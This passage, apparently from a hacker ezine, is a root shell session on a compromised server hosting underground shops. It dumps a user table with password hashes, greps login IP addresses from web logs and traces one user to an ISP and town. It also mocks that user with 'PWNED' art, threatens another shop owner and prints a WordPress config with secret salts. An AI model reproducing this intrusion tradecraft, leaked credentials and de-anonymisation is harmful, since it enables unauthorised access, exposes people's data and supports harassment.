03f828f4b26b4ebab502c56a78cc0580 | 600148357 | 70 | 0 | | +| 10304 | dasfrek | de68fbe75420c572d172d456ec9a48b3 | 158204790 | 13 | 0 | | +| 10402 | Kevko | a0017f523db6e51a75f02647a89280bd | 480179 | 9 | 0 | | +| 10440 | ahm123 | 97c45c9bb4cea4d08721d101388578bb | | 7 | 0 | | +| 10555 | homer | f54146a3fc82ab17e5265695b23f646b | | 9 | 0 | | +| 10557 | ccmajor | 1fafd7a63f5980302a5cdaa790988b7b | 158545 | 10 | 0 | | ++--------+---------------+----------------------------------+--------------+---------+--------+---+ +169 rows in set (0.01 sec) + +mysql> Aborted + +# cd /var/log/httpd + +# Some recent ip adresses?^C + +# grep "st0re.cc.*POST.*login_do.php" httpd_20110930_* httpd_access.log +httpd_20110930_a.log:st0re.cc 91.23.167.77 2 30.09.11 03:30:01 "POST /login_do.php HTTP/1.0" 47627 637 341 +httpd_20110930_a.log:st0re.cc 87.168.17.156 2 30.09.11 04:13:28 "POST /login_do.php HTTP/1.0" 8509 726 323 +httpd_20110930_a.log:st0re.cc 178.162.135.234 2 30.09.11 04:52:16 "POST /login_do.php HTTP/1.0" 8323 705 323 +httpd_20110930_a.log:st0re.cc 80.142.47.156 2 30.09.11 05:06:21 "POST /login_do.php HTTP/1.0" 8148 634 323 +httpd_20110930_a.log:st0re.cc 212.150.184.230 2 30.09.11 08:19:53 "POST /login_do.php HTTP/1.0" 8213 652 323 +httpd_20110930_a.log:st0re.cc 2.200.120.131 2 30.09.11 09:56:50 "POST /login_do.php HTTP/1.0" 8549 669 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 10:47:44 "POST /login_do.php HTTP/1.0" 8941 583 323 +httpd_20110930_a.log:st0re.cc 95.211.13.145 2 30.09.11 10:50:13 "POST /login_do.php HTTP/1.0" 8095 635 323 +httpd_20110930_a.log:st0re.cc 80.226.24.8 2 30.09.11 11:18:30 "POST /login_do.php HTTP/1.0" 8314 670 323 +httpd_20110930_a.log:st0re.cc 79.253.2.25 2 30.09.11 11:27:54 "POST /login_do.php HTTP/1.0" 8574 720 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 11:32:49 "POST /login_do.php HTTP/1.0" 8150 583 323 +httpd_20110930_a.log:st0re.cc 77.176.68.228 2 30.09.11 13:01:42 "POST /login_do.php HTTP/1.0" 8211 641 3411 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 13:19:38 "POST /login_do.php HTTP/1.0" 8286 583 323 +httpd_20110930_a.log:st0re.cc 188.136.8.225 2 30.09.11 13:56:34 "POST /login_do.php HTTP/1.0" 8711 642 323 +httpd_20110930_a.log:st0re.cc 92.241.168.24 2 30.09.11 14:31:08 "POST /login_do.php HTTP/1.0" 8377 630 323 +httpd_20110930_a.log:st0re.cc 84.140.101.35 2 30.09.11 14:51:37 "POST /login_do.php HTTP/1.0" 8876 723 323 +httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 15:34:17 "POST /login_do.php HTTP/1.0" 9479 788 341 +httpd_20110930_a.log:st0re.cc 92.201.119.237 2 30.09.11 15:45:12 "POST /login_do.php HTTP/1.0" 8372 641 323 +httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 15:57:19 "POST /login_do.php HTTP/1.0" 8163 633 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:04:08 "POST /login_do.php HTTP/1.0" 8246 583 323 +httpd_20110930_a.log:st0re.cc 88.72.19.192 2 30.09.11 16:15:47 "POST /login_do.php HTTP/1.0" 8768 630 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:22:46 "POST /login_do.php HTTP/1.0" 8777 705 341 +httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:24:21 "POST /login_do.php HTTP/1.0" 272729 732 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:26:26 "POST /login_do.php HTTP/1.0" 8575 723 323 +httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 16:30:04 "POST /login_do.php HTTP/1.0" 8150 787 323 +httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 16:30:24 "POST /login_do.php HTTP/1.0" 8242 636 323 +httpd_20110930_a.log:st0re.cc 178.7.135.0 2 30.09.11 16:33:20 "POST /login_do.php HTTP/1.0" 8378 648 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:43:58 "POST /login_do.php HTTP/1.0" 8185 583 323 +httpd_20110930_a.log:st0re.cc 92.241.164.197 2 30.09.11 16:44:05 "POST /login_do.php HTTP/1.0" 8263 654 323 +httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:48:12 "POST /login_do.php HTTP/1.0" 8888 761 323 +httpd_20110930_a.log:st0re.cc 46.115.16.29 2 30.09.11 16:55:14 "POST /login_do.php HTTP/1.0" 8958 718 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:55:44 "POST /login_do.php HTTP/1.0" 8141 723 323 +httpd_20110930_a.log:st0re.cc 88.76.37.149 2 30.09.11 16:59:33 "POST /login_do.php HTTP/1.0" 8468 643 323 +httpd_20110930_a.log:st0re.cc 77.186.7.122 2 30.09.11 17:05:15 "POST /login_do.php HTTP/1.0" 8506 632 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:05:35 "POST /login_do.php HTTP/1.0" 8739 583 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 17:06:11 "POST /login_do.php HTTP/1.0" 8214 732 323 +httpd_20110930_a.log:st0re.cc 91.53.197.228 2 30.09.11 17:07:00 "POST /login_do.php HTTP/1.0" 8094 787 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:09:32 "POST /login_do.php HTTP/1.0" 8230 583 323 +httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 17:12:29 "POST /login_do.php HTTP/1.0" 8606 640 323 +httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 17:15:16 "POST /login_do.php HTTP/1.0" 8181 633 323 +httpd_20110930_a.log:st0re.cc 84.177.153.224 2 30.09.11 17:17:27 "POST /login_do.php HTTP/1.0" 8550 650 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:23:17 "POST /login_do.php HTTP/1.0" 8164 583 323 +httpd_20110930_a.log:st0re.cc 92.224.62.134 2 30.09.11 17:25:51 "POST /login_do.php HTTP/1.0" 8164 642 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:50:25 "POST /login_do.php HTTP/1.0" 8288 583 323 +httpd_20110930_a.log:st0re.cc 178.162.135.66 2 30.09.11 17:56:45 "POST /login_do.php HTTP/1.0" 8871 612 323 +httpd_20110930_a.log:st0re.cc 77.8.111.185 2 30.09.11 18:00:22 "POST /login_do.php HTTP/1.0" 8204 635 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:06:05 "POST /login_do.php HTTP/1.0" 8037 583 323 +httpd_20110930_a.log:st0re.cc 178.86.4.72 2 30.09.11 18:09:59 "POST /login_do.php HTTP/1.0" 8348 640 323 +httpd_20110930_a.log:st0re.cc 87.156.226.177 2 30.09.11 18:15:41 "POST /login_do.php HTTP/1.0" 8184 650 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:32:35 "POST /login_do.php HTTP/1.0" 13208 583 323 +httpd_20110930_a.log:st0re.cc 62.177.139.171 2 30.09.11 18:43:36 "POST /login_do.php HTTP/1.0" 8538 612 323 +httpd_20110930_a.log:st0re.cc 188.99.237.187 2 30.09.11 18:44:23 "POST /login_do.php HTTP/1.0" 8195 631 323 +httpd_20110930_a.log:st0re.cc 84.144.24.26 2 30.09.11 18:46:44 "POST /login_do.php HTTP/1.0" 8378 733 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:58:16 "POST /login_do.php HTTP/1.0" 8107 583 323 +httpd_20110930_a.log:st0re.cc 88.128.93.67 2 30.09.11 19:14:31 "POST /login_do.php HTTP/1.0" 8347 741 323 +httpd_20110930_a.log:st0re.cc 84.159.35.59 2 30.09.11 19:28:20 "POST /login_do.php HTTP/1.0" 8304 644 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 19:35:08 "POST /login_do.php HTTP/1.0" 8222 732 323 +httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 19:43:28 "POST /login_do.php HTTP/1.0" 8076 641 323 +httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 19:45:35 "POST /login_do.php HTTP/1.0" 8195 639 323 +httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 19:49:23 "POST /login_do.php HTTP/1.0" 8152 581 323 +httpd_20110930_a.log:st0re.cc 87.156.29.114 2 30.09.11 19:52:03 "POST /login_do.php HTTP/1.0" 8481 723 323 +httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:21 "POST /login_do.php HTTP/1.0" 8568 794 341 +httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:34 "POST /login_do.php HTTP/1.0" 9612 793 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 20:10:43 "POST /login_do.php HTTP/1.0" 8277 723 323 +httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:14:09 "POST /login_do.php HTTP/1.0" 8427 581 323 +httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:15:41 "POST /login_do.php HTTP/1.0" 8416 625 341 +httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:16:47 "POST /login_do.php HTTP/1.0" 8292 641 323 +httpd_20110930_a.log:st0re.cc 213.163.65.50 2 30.09.11 20:19:02 "POST /login_do.php HTTP/1.0" 8270 629 323 +httpd_20110930_a.log:st0re.cc 84.166.216.59 2 30.09.11 20:36:40 "POST /login_do.php HTTP/1.0" 8410 721 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 20:51:21 "POST /login_do.php HTTP/1.0" 8349 732 323 +httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:54:58 "POST /login_do.php HTTP/1.0" 8343 581 323 +httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 20:56:17 "POST /login_do.php HTTP/1.0" 8158 641 323 +httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 21:14:05 "POST /login_do.php HTTP/1.0" 8708 641 323 +httpd_20110930_a.log:st0re.cc 84.189.234.204 2 30.09.11 21:17:37 "POST /login_do.php HTTP/1.0" 8194 671 323 +httpd_20110930_a.log:st0re.cc 87.139.98.60 2 30.09.11 21:23:18 "POST /login_do.php HTTP/1.0" 8082 644 323 +httpd_20110930_a.log:st0re.cc 109.236.86.130 2 30.09.11 21:35:53 "POST /login_do.php HTTP/1.0" 8154 645 323 +httpd_20110930_a.log:st0re.cc 93.186.200.12 2 30.09.11 21:45:37 "POST /login_do.php HTTP/1.0" 8409 627 341 +httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 21:46:22 "POST /login_do.php HTTP/1.0" 8157 639 323 +httpd_20110930_a.log:st0re.cc 62.141.36.190 2 30.09.11 21:50:30 "POST /login_do.php HTTP/1.0" 8119 622 341 +httpd_20110930_a.log:st0re.cc 62.141.36.190 2 30.09.11 21:50:37 "POST /login_do.php HTTP/1.0" 8241 622 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 21:53:11 "POST /login_do.php HTTP/1.0" 8070 723 323 +httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 21:53:33 "POST /login_do.php HTTP/1.0" 8254 636 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 22:07:29 "POST /login_do.php HTTP/1.0" 8648 732 323 +httpd_20110930_a.log:st0re.cc 89.15.88.227 2 30.09.11 22:19:27 "POST /login_do.php HTTP/1.0" 8205 635 341 +httpd_20110930_a.log:st0re.cc 80.239.242.78 2 30.09.11 22:21:00 "POST /login_do.php HTTP/1.0" 8402 646 323 +httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:31:06 "POST /login_do.php HTTP/1.0" 8479 721 341 +httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:33:29 "POST /login_do.php HTTP/1.0" 8240 720 323 +httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 22:33:49 "POST /login_do.php HTTP/1.0" 14741 636 323 +httpd_20110930_a.log:st0re.cc 77.24.94.72 2 30.09.11 22:34:14 "POST /login_do.php HTTP/1.0" 8203 663 341 +httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:30 "POST /login_do.php HTTP/1.0" 8304 729 341 +httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:38 "POST /login_do.php HTTP/1.0" 8228 730 323 +httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 22:42:38 "POST /login_do.php HTTP/1.0" 8094 640 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 23:08:46 "POST /login_do.php HTTP/1.0" 8207 732 323 +httpd_20110930_a.log:st0re.cc 89.204.153.246 2 30.09.11 23:10:14 "POST /login_do.php HTTP/1.0" 8285 696 323 +httpd_20110930_a.log:st0re.cc 79.192.107.57 2 30.09.11 23:20:54 "POST /login_do.php HTTP/1.0" 8307 639 323 +httpd_20110930_a.log:st0re.cc 93.196.21.139 2 30.09.11 23:29:34 "POST /login_do.php HTTP/1.0" 8856 633 323 +httpd_20110930_a.log:st0re.cc 2.213.95.13 2 30.09.11 23:50:22 "POST /login_do.php HTTP/1.0" 8379 633 323 +httpd_20110930_a.log:st0re.cc 82.83.112.126 2 30.09.11 23:56:18 "POST /login_do.php HTTP/1.0" 8721 744 323 +httpd_20110930_a.log:st0re.cc 77.20.159.112 2 01.10.11 00:20:55 "POST /login_do.php HTTP/1.0" 8354 643 323 +httpd_20110930_a.log:st0re.cc 178.9.168.231 2 01.10.11 01:13:45 "POST /login_do.php HTTP/1.0" 9722 729 341 +httpd_20110930_a.log:st0re.cc 84.59.159.134 2 01.10.11 01:35:23 "POST /login_do.php HTTP/1.0" 8207 646 323 +httpd_20110930_a.log:st0re.cc 87.139.98.60 2 01.10.11 01:48:07 "POST /login_do.php HTTP/1.0" 9020 644 323 +httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:56:01 "POST /login_do.php HTTP/1.0" 8930 640 341 +httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:58:53 "POST /login_do.php HTTP/1.0" 8227 648 341 +httpd_20110930_a.log:st0re.cc 195.71.18.209 2 01.10.11 02:40:09 "POST /login_do.php HTTP/1.0" 8594 630 323 +httpd_20110930_a.log:st0re.cc 95.118.98.231 2 01.10.11 02:47:35 "POST /login_do.php HTTP/1.0" 8143 735 341 +httpd_20110930_a.log:st0re.cc 95.222.50.203 2 01.10.11 03:00:42 "POST /login_do.php HTTP/1.0" 8455 637 323 +httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:18 "POST /login_do.php HTTP/1.0" 8322 648 341 +httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:30 "POST /login_do.php HTTP/1.0" 1543 648 341 +httpd_access.log:st0re.cc 84.189.234.204 2 01.10.11 03:56:19 "POST /login_do.php HTTP/1.0" 8108 671 323 +httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:31 "POST /login_do.php HTTP/1.0" 8725 629 341 +httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:57 "POST /login_do.php HTTP/1.0" 8745 627 323 +httpd_access.log:st0re.cc 84.74.179.83 2 01.10.11 05:17:41 "POST /login_do.php HTTP/1.0" 8227 724 323 +httpd_access.log:st0re.cc 66.176.9.110 2 01.10.11 06:22:46 "POST /login_do.php HTTP/1.0" 8182 889 323 +httpd_access.log:st0re.cc 84.171.65.229 2 01.10.11 11:16:40 "POST /login_do.php HTTP/1.0" 10603 646 323 +httpd_access.log:st0re.cc 213.135.18.45 2 01.10.11 11:32:59 "POST /login_do.php HTTP/1.0" 8670 581 323 +httpd_access.log:st0re.cc 92.224.58.242 2 01.10.11 11:59:27 "POST /login_do.php HTTP/1.0" 8330 633 323 +httpd_access.log:st0re.cc 115.184.3.252 2 01.10.11 12:12:22 "POST /login_do.php HTTP/1.0" 8176 699 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 12:41:47 "POST /login_do.php HTTP/1.0" 8422 787 323 +httpd_access.log:st0re.cc 89.0.20.128 2 01.10.11 13:00:16 "POST /login_do.php HTTP/1.0" 8213 647 323 +httpd_access.log:st0re.cc 85.17.97.27 2 01.10.11 13:31:59 "POST /login_do.php HTTP/1.0" 8667 634 341 +httpd_access.log:st0re.cc 212.150.184.230 2 01.10.11 13:37:20 "POST /login_do.php HTTP/1.0" 8082 652 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:48:36 "POST /login_do.php HTTP/1.0" 8041 787 323 +httpd_access.log:st0re.cc 80.142.41.35 2 01.10.11 13:56:41 "POST /login_do.php HTTP/1.0" 8142 675 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:58:43 "POST /login_do.php HTTP/1.0" 1754 787 323 +httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:46 "POST /login_do.php HTTP/1.0" 8161 636 341 +httpd_access.log:st0re.cc 178.202.68.98 2 01.10.11 14:09:49 "POST /login_do.php HTTP/1.0" 8236 636 323 +httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:52 "POST /login_do.php HTTP/1.0" 8429 644 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:30:23 "POST /login_do.php HTTP/1.0" 8060 794 341 +httpd_access.log:st0re.cc 87.122.41.84 2 01.10.11 14:42:56 "POST /login_do.php HTTP/1.0" 8176 633 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:45:00 "POST /login_do.php HTTP/1.0" 1750 787 323 +httpd_access.log:st0re.cc 92.224.11.28 2 01.10.11 15:03:01 "POST /login_do.php HTTP/1.0" 8030 664 341 +httpd_access.log:st0re.cc 88.74.202.98 2 01.10.11 15:45:47 "POST /login_do.php HTTP/1.0" 8167 661 323 +httpd_access.log:st0re.cc 95.118.133.136 2 01.10.11 15:50:25 "POST /login_do.php HTTP/1.0" 8025 641 323 +httpd_access.log:st0re.cc 217.79.178.233 2 01.10.11 15:52:07 "POST /login_do.php HTTP/1.0" 8115 726 323 +httpd_access.log:st0re.cc 77.188.205.152 2 01.10.11 15:56:27 "POST /login_do.php HTTP/1.0" 8137 643 323 +httpd_access.log:st0re.cc 87.122.34.237 2 01.10.11 15:58:01 "POST /login_do.php HTTP/1.0" 8125 635 323 +httpd_access.log:st0re.cc 212.117.165.197 2 01.10.11 16:25:15 "POST /login_do.php HTTP/1.0" 8005 646 323 +httpd_access.log:st0re.cc 46.20.44.58 2 01.10.11 16:26:19 "POST /login_do.php HTTP/1.0" 7911 638 341 +httpd_access.log:st0re.cc 93.223.63.24 2 01.10.11 16:39:27 "POST /login_do.php HTTP/1.0" 8066 631 323 +httpd_access.log:st0re.cc 77.20.159.112 2 01.10.11 16:47:10 "POST /login_do.php HTTP/1.0" 8025 643 323 +httpd_access.log:st0re.cc 109.236.86.130 2 01.10.11 16:59:19 "POST /login_do.php HTTP/1.0" 1524 719 323 +httpd_access.log:st0re.cc 88.69.129.69 2 01.10.11 17:01:04 "POST /login_do.php HTTP/1.0" 8045 721 323 +httpd_access.log:st0re.cc 62.141.46.134 2 01.10.11 17:06:19 "POST /login_do.php HTTP/1.0" 8112 645 323 +httpd_access.log:st0re.cc 93.133.47.182 2 01.10.11 17:14:46 "POST /login_do.php HTTP/1.0" 8307 622 341 + +# And who is the guy behind that crap?^C + +# last | grep mmgen +mmgen ftp 212.150.184.230 Mon Oct 3 16:58 - 16:59 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:57 - 16:58 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:43 - 16:44 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:10 - 16:11 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:10 - 16:13 (00:03) +mmgen ftp 212.150.184.230 Mon Oct 3 16:04 - 16:05 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 16:00 (00:05) +mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 15:54 (00:00) +mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 15:57 (00:03) + +# Israel does not look that interesting...^C + +# grep mgen.*78 /var/log/proftpd-transfer.log +Sun Dec 19 14:56:29 2010 0 92.241.164.197 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180253783625111 b _ d r mmgen ftp 0 * c +Fri Jan 14 23:16:40 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180257808454951 a _ d r mmgen ftp 0 * c +Sun Jan 23 16:36:30 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180256065317802 a _ d r mmgen ftp 0 * c +Thu Jan 27 23:14:04 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ o r mmgen ftp 0 * c +Thu Jan 27 23:14:07 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ o r mmgen ftp 0 * c +Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ d r mmgen ftp 0 * c +Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ d r mmgen ftp 0 * c + +78.42.186.98 resolves to Kabel Baden-Wuerttemberg GmbH & Co. KG, +Muellheim in Germany. Looks like someone did not constantly use a +proxy. Means you are officially + . + / \ + | | + |.| PWNED LOL! + |.| / + |:| __ / +,_|:|_, / ) + (Oo / _I_ + +\ \ || __| + \ \||___| + \ /.:.\-\ + |.:. /-----\ + |___|::pwn::| + / |:<_T_>:| + |_____\ ::: / + | | \ \:/ + | | | | + \ / | \___ + / | \_____\ + +Alright people let's keep the show going with El-Basar.biz ... + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((========{ El-Basar.biz }=======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Searching for "El-Bazar.biz" on google gives a +,;' \ /-(.;, ) good impression of what's being sold there. You + ) / ) / can buy one week of DDOS to take down one web- + // || site for 250 Euros. You get 10 US CCs without + )_\ )_\ DOB (date of birth) for 5 Euros. And you can even +buy 50g of MDMA crystals for 2000 Euros. Hilarious! El-Basar is being +run by some guy called Ganymedes and was hosted on the same server as +St0re.cc. However it seems like Ganymedes has moved his shop to +another location which sadly has not been backdoored by us so far and +thus will not make it into this issue of our ezine. Notwithstanding he +left enough data on his old box, but we must say, Ganymedes, if you +don't take down your store, we will be so kind and do that for you +sooner or later. Thanks. + +# pwd +/home + +# ls -la +total 116 +drwx--x--x 28 root wheel 1024 Sep 14 17:31 . +drwx--x--x 18 root wheel 512 Apr 12 19:59 .. +drwxrwx--- 13 alg www 1024 Feb 19 2011 alg +drwxr-x--- 4 ayoga www 512 Apr 23 2009 ayoga +drwxr-x--- 5 crank2010 www 512 Dec 27 2009 crank2010 +drwxr-x--- 4 exchanger www 512 Mar 31 2010 exchanger +drwxr-x--- 6 filip www 512 Jul 16 2010 filip +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 ganymedes +drwxr-x--- 6 garf www 512 Apr 16 02:26 garf +drwxr-x--- 4 lordknight www 512 Jan 3 2010 lordknight +drwxr-x--- 4 madrage www 512 Jan 10 2010 madrage +drwxrwxr-x 5 margosha www 512 Sep 8 16:22 margosha +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 mmgen +drwxr-x--- 9 mr101 www 512 Apr 7 2010 mr101 +drwxr-x--- 4 msk www 512 May 20 2009 msk +drwxr-x--- 4 muraaat www 512 Aug 29 20:59 muraaat +drwxr-x--- 7 nukeuploads www 512 Dec 2 2009 nukeuploads +drwxr-x--- 8 onlineschauen www 512 Oct 1 23:57 onlineschauen +drwxr-x--- 4 pavlrse www 512 Aug 21 03:32 pavlrse +drwxr-x--- 8 propiska www 512 Nov 19 2010 propiska +drwxr-x--- 5 scenehack www 512 Feb 22 2010 scenehack +drwxr-x--- 4 snetwork www 512 Jul 14 22:01 snetwork +drwxr-x--- 5 szenevz www 512 Mar 11 2010 szenevz +drwxr-x--- 2 test4me www 512 Sep 2 01:39 test4me +drwxr-x--- 4 thefuelru www 512 Jan 22 2010 thefuelru +drwxr-x--- 4 useresu www 512 Aug 19 11:27 useresu +drwxr-x--- 4 useresu1 www 3584 Aug 19 11:47 useresu1 +drwxrwxr-x 6 vestacomp www 512 Dec 20 2010 vestacomp + +# cd ganymedes + +# ls -la +total 1180 +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 . +drwx--x--x 28 root wheel 1024 Sep 14 17:31 .. +-rw------- 1 root www 520192 Oct 5 21:43 bash.core +drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 el-basar.biz +drwxrwx--- 6 ganymedes www 1024 Sep 28 23:58 newsportal24.net +drwxrwx--- 2 ganymedes www 53760 Oct 6 00:38 temp + +# cd newsportal24.net + +# ls -la +total 388 +drwxrwx--- 6 ganymedes www 1024 Sep 28 23:58 . +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 .. +-rw-r--r-- 1 ganymedes www 397 Sep 27 18:24 index.php +-rw-r--r-- 1 ganymedes www 16572 Sep 27 18:24 license.txt +drwxr-xr-x 2 ganymedes www 512 Sep 29 00:50 test +-rw-r--r-- 1 ganymedes www 4343 Sep 27 18:24 wp-activate.php +drwxr-xr-x 9 ganymedes www 2560 Sep 27 18:25 wp-admin +-rw-r--r-- 1 ganymedes www 40243 Sep 27 18:24 wp-app.php +-rw-r--r-- 1 ganymedes www 226 Sep 27 18:24 wp-atom.php +-rw-r--r-- 1 ganymedes www 274 Sep 27 18:24 wp-blog-header.php +-rw-r--r-- 1 ganymedes www 3931 Sep 27 18:24 wp-comments-post.php +-rw-r--r-- 1 ganymedes www 244 Sep 27 18:24 wp-commentsrss2.php +-rw-r--r-- 1 ganymedes www 3577 Sep 27 18:24 wp-config-sample.php +-rw-rw-rw- 1 www www 3896 Sep 27 18:33 wp-config.php +drwxr-xr-x 6 ganymedes www 512 Sep 27 18:40 wp-content +-rw-r--r-- 1 ganymedes www 1255 Sep 27 18:24 wp-cron.php +-rw-r--r-- 1 ganymedes www 246 Sep 27 18:24 wp-feed.php +drwxr-xr-x 8 ganymedes www 2560 Sep 27 18:26 wp-includes +-rw-r--r-- 1 ganymedes www 1997 Sep 27 18:24 wp-links-opml.php +-rw-r--r-- 1 ganymedes www 2618 Sep 27 18:24 wp-load.php +-rw-r--r-- 1 ganymedes www 27601 Sep 27 18:24 wp-login.php +-rw-r--r-- 1 ganymedes www 7774 Sep 27 18:24 wp-mail.php +-rw-r--r-- 1 ganymedes www 494 Sep 27 18:24 wp-pass.php +-rw-r--r-- 1 ganymedes www 224 Sep 27 18:24 wp-rdf.php +-rw-r--r-- 1 ganymedes www 334 Sep 27 18:24 wp-register.php +-rw-r--r-- 1 ganymedes www 224 Sep 27 18:24 wp-rss.php +-rw-r--r-- 1 ganymedes www 226 Sep 27 18:24 wp-rss2.php +-rw-r--r-- 1 ganymedes www 9839 Sep 27 18:24 wp-settings.php +-rw-r--r-- 1 ganymedes www 18646 Sep 27 18:24 wp-signup.php +-rw-r--r-- 1 ganymedes www 3702 Sep 27 18:24 wp-trackback.php +-rw-r--r-- 1 ganymedes www 3266 Sep 27 18:24 xmlrpc.php + +# cat wp-config.php +_irty|#bG+hp@Qj6%qo.-N d.ZnGC=f@`m'); +define('AUTH_SALT', 'T|#(IjI)JW%66G(e2S}$k-8/QY.iEfl^/v}PWgtk$@cnw9d)N pAm4A,A.~f+x_Hc}V^Wi${iO%`$FJb8%~W?$|*l{%$+cK2.{A*ZNW>)~Ht0r,p B[3('); +define('LOGGED_IN_SALT', 'n[Un&54kqxFw|!d]ccfCV5ajNklT`YN/YECk (K2}T{;,0,*!|)ru}/ysPG s$v-'); +define('NONCE_SALT', 'cm$vLkM34?(0u}&O)SOp>qCRZq*LJY``ym%-tNFg+MQ^#L{x~@c,d@fCJ27{;d~8'); + +/**#@-*/ + +/** + * WordPress Datenbanktabellen-Präfix + * + * Wenn du verschiedene Präfixe benutzt, kannst du innerhalb einer Datenbank + * verschiedene WordPress-Installationen betreiben. Nur Zahlen, Buchstaben und Unterstriche bitte! + */ +$table_prefix = 'wp_news'; + +/** + * WordPress Sprachdatei + * + * Hier kannst du einstellen, welche Sprachdatei benutzt werden soll. Die entsprechende + * Sprachdatei muss im Ordner wp-content/languages vorhanden sein, beispielsweise de_DE.mo + * Wenn du nichts einträgst, wird Englisch genommen. + */ +define('WPLANG', 'de_DE'); + +/** + * For developers: WordPress debugging mode. + * + * Change this to true to enable the display of notices during development. + * It is strongly recommended that plugin and theme developers use WP_DEBUG + * in their development environments. + */ +define('WP_DEBUG', false); + +/* That's all, stop editing! Happy blogging. */ + +/** Absolute path to the WordPress directory. */ +if ( !defined('ABSPATH') ) + define('ABSPATH', dirname(__FILE__) . 